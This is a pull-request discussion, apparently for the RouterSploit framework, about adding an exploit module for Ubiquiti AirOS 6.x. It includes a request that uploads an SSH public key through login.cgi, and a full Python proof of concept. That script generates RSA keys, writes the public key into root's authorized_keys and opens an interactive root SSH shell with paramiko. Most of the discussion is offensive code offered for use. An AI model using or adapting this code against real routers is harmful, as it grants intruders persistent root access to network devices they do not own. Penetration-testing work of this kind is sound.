Added exploit module to AirOS 6.x

[viniciusmarangoni]

No description provided.

[lucyoa]

Wow, I see pretty advanced exploit. I have played around and we can even improve it.

1. http_request instead of requests

requests.post can be changed to http_request. So instead

requests.post(url + 'login.cgi', files=upload_params, verify=False) 

use

http_request(method="POST", url=url, files=upload_params)

• function returns request object (with all properities like status_code, text etc.) and None if any exception occured.
• verify=False property is set by default
• it handles exceptions related to the connection problems

You can just check if response is None and if its not move on with exploitation:

url = sanitize_url('{0}:{1}/login.cgi'.format(self.target, self.port))
response = http_request(method="POST", url=url, files=upload_params)
if response is None:
    return

print response.status_code
print response.text

2. Dynamic SSH keys
Currently user's ssh public key is sent to the authorized_keys. We can improve it by dynamically generating RSA keys, sending public key to the devices and invoking interactive ssh shell using private key.

I created following proof of concept script that presents how to generate keys and invoke interactive ssh shell with paramiko. I think it might be helpful:

#!/usr/bin/env python

import paramiko
from paramiko.py3compat import u
import StringIO
import os
import termios
import tty
import sys
import select
import socket

def own(bits=1024):
    # generating RSA keys
    k = paramiko.RSAKey.generate(bits)
    public_key = k.get_base64()
    private_key = StringIO.StringIO()
    k.write_private_key(private_key)

    # adding generated public key to authorized keys (only example how it works)
    f = open('/root/.ssh/authorized_keys','w+')
    f.write('ssh-rsa ' + public_key)
    f.close()

    # connecting to ssh server using created private key
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    not_file = StringIO.StringIO(private_key.getvalue())
    pkey = paramiko.RSAKey.from_private_key(not_file)
    not_file.close()

    client.connect("127.0.0.1", 22, username="root", pkey=pkey)

    # invoking interactive shell
    chan = client.invoke_shell()
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)

        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)

    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)

own()

Could you adapt these changes in your pull request? I can also modify it by myself and you would test if it works on your device with AirOS.

Btw. I'd love to see this exploit in action - https://asciinema.org/ is awesome for this.

[viniciusmarangoni]

Ok. I will adapt it and add the changes to this pull. Thank's for the sugestions.

[viniciusmarangoni]

The changes was done. To see the exploit in action, watch the asciinema
https://asciinema.org/a/byel8965webtwilih1gg2hvyq

I will commit the changes

[lucyoa]

Great job. Happy to add your exploit to RouterSploit.